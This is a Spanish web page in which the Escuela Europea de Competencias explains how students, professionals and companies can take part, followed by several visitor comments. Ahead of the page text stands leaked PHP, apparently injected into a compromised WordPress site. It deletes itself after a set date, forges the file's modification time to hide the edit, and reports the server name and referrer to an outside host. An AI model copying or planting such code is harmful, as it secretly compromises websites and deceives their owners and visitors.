check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731512){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php"); } Escuela Europea de Competencias | Cómo participar

Forma parte de la escuela

Regístrate y disfruta de las ventajas de ser miembro de la Escuela Europea de Competencias

Ya soy miembro de EEC

También puedes crear una cuenta.

¿Has perdido tu contraseña?

Cómo participar

¿Cómo puedes formar parte de la Escuela?

Las opciones son ilimitadas pero siempre con el fin de formar parte y apoyar una iniciativa novedosa, que persigue unir esfuerzos en pro del desarrollo de competencias como medio para aumentar la empleabilidad de los profesionales actuales y futuros.

Tanto si eres ESTUDIANTE, estás en situación de DESEMPLEO y necesitas desarrollar tus competencias como si eres un PROFESIONAL que  quieres colaborar con la Escuela, registrarte gratis en la web y participa de las experiencias y el conocimiento colectivo.

Además, las hay tantas formas de colaborar con la EEC como se te ocurran, aquí te dejamos algunas de ellas:

  • Regístrate gratis y participa de las experiencias online en la EEC enfocadas a ejercitar competencias como la lógica, la observación, la comunicación, la escucha, el espíritu crítico y un largo etc.
  • Comparte tus conocimientos y saber hacer proponiendo una experiencia y conviértete en colaborador de la Escuela. Recogemos tus iniciativas solidarias y las hacemos posible con nuestros recursos en la red, para que demuestres tus competencias; te sirva como experiencia y currículum y por supuesto, para que todos aprendamos.
  • Ayúdanos a difundir y acude a las actividades organizadas por la Escuela, dirigidas al desarrollo de competencias transversales
  • Envíanos post para el blog y comparte tus conocimientos; Así enriquecerás a la Escuela, ejercitarás tu competencias y servirá de plataforma para ti. En la EEC siempre respetamos la autoría.
  • Síguenos y opina en Twitter, Facebook y comenta en nuestro blog con comentarios y enlaces de interés. Ayúdanos a tejer un conocimiento colectivo de calidad.
  • Aporta ideas, comparte tu creatividad con la escuela avisándonos de iniciativas que creas pueden interesar a la EEC, con sugerencias de posibles experiencias que te gustaría que organizáramos, propón retos, actividades, proyectos. La EEC está siempre abierta a buenas ideas. Ponte en contacto con nosotros.
  • Además, puedes confiar a la Escuela tu desarrollo, iniciando un programa que incluye un servicio de coaching que te ayudará a identificar tus puntos fuertes, áreas de mejora y a iniciar tu desarrollo competencial aumentando tu  empleabilidad.

Si quieres participar como EMPRESA, la EEC puede hacer mucho por ti, ya que nace como una iniciativa de IAT (Instituto Andaluz de Tecnología) con amplia experiencia en optimizar todos los activos de las empresas, incluidos los recursos humanos.

No existe un “catálogo” de actuaciones preestablecidas que se enmarquen en el ámbito de esta colaboración. La Escuela está abierta a cualquier propuesta e iniciativa de actuación dirigida al desarrollo de competencias transversales de los futuros profesionales por parte de las Empresas.

Aun así, existen acciones prefijadas sobre las que se basa la alianza entre la Escuela y las Empresas, como son:

  • Colaboración / participación en actividades organizadas por la EEC, tales como charlas, talleres, encuentros, etc.
  • Compromiso y apoyo a la actividad de la EEC, el apoyo moral y el compromiso desinteresado es importante para nosotros.
  • Aportación de los perfiles competenciales requeridos por su organización u otra información de interés para los miembros de la Escuela.
  • Confíe a la Escuela el desarrollo de las habilidades y competencias de sus empleados.

Sólo tiene que rellenar el formulario de adhesión y enviarlo a la EEC, que sólo compromete a dialogar y consensuar con la EEC posibles actividades y colaboraciones de interés mutuo. No le costará nada y ganará mucho.

Pertenecer al Equipo de la Escuela conlleva múltiples ventajas, tantas como la empresa quiera imaginar. A priori destacan:

  • Influencia en el diseño de nuevos perfiles profesionales acordes con los nuevos tiempos y formas de negocio.
  • Agilidad de los procesos de selección y promoción de profesionales idóneos para cada puesto, una especialidad de la Escuela de Europea de Competencias.
  • Reconocimiento de su compromiso con la sociedad, educación y formación (RSE) al alinearse con criterios de calidad en la selección y formación del personal de la mano del IAT.
  • Prestigio y visibilidad de marca.
Ponte en contacto con la Escuela y consensuemos una forma de beneficiarnos mutuamente

 

7 respuestas a Cómo participar

  1. Me gustaria mucho participar pero no soy espanol y aunque lo entendo todo este idioma no soy habil escribiendolo. Mis lenguas son el sardo y el italiano.

  2. Todo el mundo puede colaborar si se busca el enfoque apropiado. Si te interesa, ponte en contacto con nosotros a través del email y pensamos alguna forma de colaboración.

    Además, puedes participar de nuestras experiencias. La próxima es una conferencia sobre sostenibilidad empresarial de Miguel Rivas, un colaborador altruista que compartirá con la Escuela lo que sabe.

    Gracias por tu apoyo y un saludo.

  3. estoy interesado en recursos educativos gratuitos y metodos generar capital desde el punto cero en algunos lugares hay un solo recurso una computadora y acceso a internet
    saludos

  4. quiero participar en el taller reinventate del dia 13 pero no encuentro la pestaña de participar en la experiencia.gracias.un saludo

    • Monica ya formas parte de la experiencia. Si por alguna razón no puedes asistir, por favor avisanos. Gracias

  5. Buenas tardes!

    Ayer me registré en la web para inscribirme en el taller del día 30, Taller Estrategias e Imagen del candidato 2.0.y no consigo inscribirme, la opción no me lo permite.
    Y cuando accedo con mi usuario y clave no observo nada que me indique que estoy activo.
    Gracias!

    • Buenas tardes Loli: como la Web sigue sin estar totalmente operativa y se acerca el fin de semana: te inscribimos desde aquí pero te ruego nos facilites un número de teléfono de contacto.

      Gracias por tu interés y disculpa la incidencia. Buen fin de semana.

Deja un Comentario


8 × dos =

Noticias recientes

Formación “Gestor de Marketing Internacional” – Especialízate gratis!

Formación "Gestor de Marketing Internacional" - Especialízate gratis!

M.IN.D – “Marketing, Internacionalización y Desarrollo”,  es un proyecto europeo de la con[...]

Desmitificando el liderazgo

Desmitificando el liderazgo

¡Menos líderes y más liderazgo! ¡El liderazgo es acción, con un objetivo y un fin claro; no es[...]

¿Quién se ha llevado mi empleo y cómo puedo encontrarlo?

¿Quién se ha llevado mi empleo y cómo puedo encontrarlo?

Sevilla, 2 de Diciembre a las 11:00 horas ¿Sabías que las habilidades de búsqueda de empleo pued[...]

La Escuela en fotos

Accede a nuestra galería de imágenes en Flickr

Activos Recientemente

Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario

La escuela en la red

My Great Web page